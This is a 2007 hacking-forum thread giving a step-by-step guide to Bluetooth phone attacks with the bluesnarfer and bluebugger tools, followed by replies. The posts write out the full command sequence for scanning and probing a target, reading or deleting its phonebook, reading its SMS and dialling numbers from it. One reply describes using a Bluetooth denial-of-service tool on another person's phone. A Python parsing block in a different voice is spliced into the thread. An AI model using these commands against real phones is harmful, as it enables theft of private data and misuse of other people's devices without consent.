Remote Exploit Forums

#1 Dr_GrEeN (Senior Member), 09-15-2007, 04:44 AM
Bluesnarfer & Bluebugger Guide With Backtrack

Hey Guys

Just thought I'd post a little on Bluetooth hacking because I can see there are a lot of questions and not a lot of answers. So here's how I hacked my Samsung D600.

First I popped to my local supermarket and picked myself up a Bluetooth dongle for 6.99!!!! Because my shitty Toshiba Satellite P100 doesn't have Bluetooth.

Ok first lets configure BT.................

Type :

bt ~ # mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

That's Bluesnarfer done, now for bluebugger.............

Type:

bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0

Ok now we can fire up our Bluetooth adaptor, so type:

bt ~ # hciconfig hci0 up

Now our Bluetooth adaptor should be ready; check by typing:

bt ~ # hciconfig hci0

and you should see something like this:

hci0: Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0

Ok now we are ready to scan so type:

bt ~ # hcitool scan hci0

And you should see all the devices in the area. You can also use btscanner and btscanner has a bruteforce scanner for discovering hidden devices.

Now note the name and MAC of the target and let's move on.

First thing, let's try to ping our target. Type:

l2ping <target MAC>

If you don't get a ping, GOOD LUCK

Next we need to find out a little about the device we want to hack, so let's fire up blueprint.

And type:

sdptool browse --tree --l2cap <target MAC>

And you should get something like this:


Code:
Browsing 00:16:DB:A1:B6:B9 ...
Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10000
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID128 : 0xdb1d8f12-95f3-402c-9b97-bc504c9a-55c4
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x1
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x6 - LanguageBaseAttributeIDList
  Data Sequence
    Code ISO639 (Integer) : 0x656e
    Encoding (Integer) : 0x6a
    Base Offset (Integer) : 0x100
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID128 : 0x1cdb1d8f-1295-f340-2c9b-97bc504c-9a55
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 57 42 54 45 58 54 00 00
Attribute Identifier : 0x8003
  Integer : 0x1

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10001
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1101 - SerialPort
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x2
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1101 - SerialPort
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 53 65 72 69 61 6c 20 50 6f 72 74 00 00

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10002
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1103 - DialupNetworking (DUN)
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x3
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1103 - DialupNetworking (DUN)
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 44 69 61 6c 2d 75 70 20 4e 65 74 77 6f 72 6b 69 6e 67 00 00
Attribute Identifier : 0x305
  Integer : 0x0

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10003
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1112 - HeadsetAudioGateway
    UUID16 : 0x1203 - GenericAudio
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x4
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1108 - Headset
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 56 6f 69 63 65 20 47 57 00 00

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10004
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x111f - HandsfreeAudioGateway
    UUID16 : 0x1203 - GenericAudio
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x5
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x111e - Handsfree
      Version (Integer) : 0x101
Attribute Identifier : 0x100
  Data : 56 6f 69 63 65 20 47 57 00 00
Attribute Identifier : 0x301
  Integer : 0x1
Attribute Identifier : 0x311
  Integer : 0x1

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10005
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x110a - AudioSource
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
      Channel/Port (Integer) : 0x19
    Data Sequence
      UUID16 : 0x0019 - AVDTP
      Channel/Port (Integer) : 0x100
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x110d - AdvancedAudio
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 41 64 76 61 6e 63 65 64 20 61 75 64 69 6f 20 73 6f 75 72 63 65 00 00
Attribute Identifier : 0x311
  Integer : 0x1

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10006
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x110c - RemoteControlTarget
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
      Channel/Port (Integer) : 0x17
    Data Sequence
      UUID16 : 0x0017 - AVCTP
      Channel/Port (Integer) : 0x100
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x110e - RemoteControl
      Version (Integer) : 0x100
Attribute Identifier : 0x311
  Integer : 0x100

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10007
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1106 - OBEXFileTransfer
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x6
    Data Sequence
      UUID16 : 0x0008 - OBEX
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1106 - OBEXFileTransfer
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 4f 42 45 58 20 46 69 6c 65 20 54 72 61 6e 73 66 65 72 00 00

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10008
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1105 - OBEXObjectPush
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x7
    Data Sequence
      UUID16 : 0x0008 - OBEX
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1105 - OBEXObjectPush
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 4f 62 6a 65 63 74 20 50 75 73 68 00 00
Attribute Identifier : 0x303
  Data Sequence
    Integer : 0x1
    Integer : 0x3
    Integer : 0x5
    Integer : 0xff
Now if you asked me what this means I wouldn't know, but I think it tells you a bit about the channels and what services are running on what channel.

Anyway, after playing a bit I found that my D600 uses channel 7 for phonebook lookup etc. I think every make and model is different, so you might have to try a few until you get the right one. Like I said, I'm only just getting to grips with Linux, so if anybody knows any more I'd love to read about it.

End Part 1
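The sdptool output above is a list of SDP service records. Inside each record's ProtocolDescriptorList, a Channel/Port that follows the RFCOMM UUID is the server channel a client would open, while one that follows L2CAP is a PSM, which RFCOMM-based tools cannot use. This added example (Python 3.8+, not part of the post; the regexes and the trimmed sample records are mine) parses that format and maps RFCOMM channels to service classes, so the channel-to-service question the poster guesses at can be read straight from the browse output:

```python
import re

ATTR = re.compile(r"^Attribute Identifier : (0x[0-9a-f]+)", re.I)
UUID = re.compile(r"^\s+UUID\d+ : (\S+)(?: - (\S+))?", re.I)
CHAN = re.compile(r"^\s+Channel/Port \(Integer\) : (0x[0-9a-f]+)", re.I)
# Constructed sample: two records from the post above, trimmed to the attributes
# that matter here (SerialPort on RFCOMM 2; AudioSource on an L2CAP PSM only).
SAMPLE = """\
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1101 - SerialPort
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x2

Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x110a - AudioSource
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
      Channel/Port (Integer) : 0x19
"""

def parse_records(text):
    """Yield one dict per SDP record: its service classes and RFCOMM channel (or None)."""
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec, attr, uuid = {"classes": [], "rfcomm": None}, None, None
        for line in chunk.splitlines():
            if m := ATTR.match(line):
                attr = int(m.group(1), 16)
            elif m := UUID.match(line):
                uuid = m.group(2) or m.group(1)
                if attr == 0x1:
                    rec["classes"].append(uuid)
            # A Channel/Port right after the RFCOMM UUID is the server channel;
            # after L2CAP it is a PSM, which rfcomm-based tools cannot open.
            elif (m := CHAN.match(line)) and attr == 0x4 and uuid == "RFCOMM":
                rec["rfcomm"] = int(m.group(1), 16)
        yield rec

def rfcomm_channel_map(text):
    """{channel: 'Class1/Class2'} for every record reachable over RFCOMM."""
    return {r["rfcomm"]: "/".join(r["classes"])
            for r in parse_records(text) if r["rfcomm"] is not None}
```

Run it over the full browse output from the post and the resulting map is the inventory of what the phone exposes over RFCOMM; a channel missing from it is one that will refuse the connection.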
#2 Dr_GrEeN, 09-15-2007, 04:47 AM

Part 2

Ok let's get to it ...... Start a shell and let's take a look at bluesnarfer's options, so type:

bt ~ # bluesnarfer

And you should get :
Code:
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD     : valid AT+CMD (GSM EXTENSION)

TYPE      : valid phonebook type ..
example   : "DC" (dialed call list)
            "SM" (SIM phonebook)
            "RC" (recevied call list)
            "XX" much more

-b bdaddr : bluetooth device address
-C chan   : bluetooth rfcomm channel

-c ATCMD  : custom action
-r N-M    : read phonebook entry N to M
-w N-M    : delete phonebook entry N to M
-f name   : search "name" in phonebook address
-s TYPE   : select phonebook memory storage
-l        : list aviable phonebook memory storage
-i        : device info
Ok so now we have some options, let's begin. Type:

bluesnarfer [options] -C 7 -b <target MAC>

e.g. bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55

And the hack should start ........

Now bluebugger Type:

bluebugger -h

And you should get :
Code:
bluebugger 0.1 (cant post urls :D)
-----------------------------------------

Usage: bluebugger [OPTIONS] -a <addr> [MODE]

       -a <addr>     = Bluetooth address of target

       Options:
       --------
       -m <name>     = Name to use when connecting (default: '')
       -d <device>   = Device to use (default: '/dev/rfcomm')
       -c <channel>  = Channelto use (default: 17)
       -n            = No device name lookup
       -t <timeout>  = Timeout in seconds for name lookup (default: 5)
       -o <file>     = Write output to <file>

       Mode:
       -----
       info                   = Read Phone Info   (default)
       phonebook              = Read Phonebook    (default)
       messages               = Read SMS Messages (default)
       dial <num>             = Dial number
       ATCMD                  = Custom Command (e.g. '+GMI')

       Note: Modes can be combined, e.g. 'info phonebook +GMI'
Again, now we have our options, let's hack .............. Type:

bluebugger [OPTIONS] -c 7 -a <target MAC> [MODE]

e.g. bluebugger -m Dr_GrEeN -c 7 -a 00:11:22:33:44:55 dial 0845GAYPORN

And again you should see some results.

The only downside to hacking into my D600 is that you still have to allow it on the phone, so it's not exactly HACKING the D600, but it's a good training session. And now you can go forth and play.

Hope you lot can understand my bad spelling etc. and have fun

PS: Can somebody swap these posts around? Sorry, my fault. And oh yeah, an RFCOMM Connection refused error is normally the wrong channel. If after using bluebugger you get an operation already in progress error, type:

hciconfig hci0 down
hciconfig hci0 reset
hciconfig hci0 up

And all should be well.

Last edited by Dr_GrEeN; 09-15-2007 at 04:58 AM.
#3 -=Xploitz=- (Senior Member), 09-15-2007, 04:59 AM

Dr_GrEen,

Bravo!!!

EXCELLENT TUTORIAL, AND WELCOME TO THE FORUMS!

P.S.

You know way 2 much about hacking Bluetooth to be a no0bie

Moving to tutorial Section.

Keep up the Great work!
#4 shamanvirtuel (Senior Member), 09-15-2007, 05:13 AM

Yep, excellent work ..... I wish more new members contributed in such a fruitful manner....

Welcome, and don't hesitate to ask if you've got a pb with anything......

BTW.... you may open an account on our wiki and add this tuto to our howto section.... could be really cool

THX
#5 wyze, 09-15-2007, 08:38 AM

Awesome tut man... was going to do a similar writeup, but time hasn't been my friend as of late

Another fun tool I like to use to let my old lady know her time is up playing games on her Blackberry (after hours on end) is a BT DoS prog in the tbear suite tanya.
#6 NoobBiscUiT (Member), 10-27-2007, 06:51 AM

Ok so this is what I did and got.... I've been working with this for a while now, and I HAVE searched everything; that's how I found this thread and other useful tools
*with editing

bluebugger -c 8 -a 00:19:A1:F6:00:75 dial 1434560092
bluebugger 0.1 ( MaJoMu |
-----------------------------------------

Target Device: '00:19:A1:F6:00:75'
Target Name: 'LG'

tcgetattr failed: Input/output error
bt_rfcomm_config() failed

Channel 8 is my BT modem, and I can connect to it, BUT when it establishes a connection my phone asks for a passkey, and I enter a random character, then it says connection failed.
I'm guessing there's a way to create a passkey between the phone and my computer through BT, but I don't know how, and that's why I'm asking this way too long question.
Guidance would be great.
Thanks
#7 (Just burned his ISO), 10-29-2007, 03:06 AM

I've only used RFComm to do simple tasks and only with my cellular phone. So I can't really offer any advice on how to use that prog. But I do know that most of the time, except for in cellular phone pairing, there is a default passkey. A couple of different BT devices I own use 0000. Try that.
#8 NoobBiscUiT, 10-29-2007, 09:54 PM

Right, but I was using bluebugger, so unless I have to do something with rfcomm first, why would that failure message come up?
My understanding is that they are different programs and have nothing to do with each other.
#9 Dr_GrEeN, 10-29-2007, 10:40 PM

Sorry didn't see this question lol

Please enter this command and post results

Code:
sdptool browse --l2cap <target MAC>
#10 NoobBiscUiT, 10-30-2007, 06:06 AM

Deal,
I believe I did this command when I first found my phone using btscanner,
then l2ping like you said.

RESULTS..... wait. I didn't boot with my Bluetooth.
Ok, I'll redo this.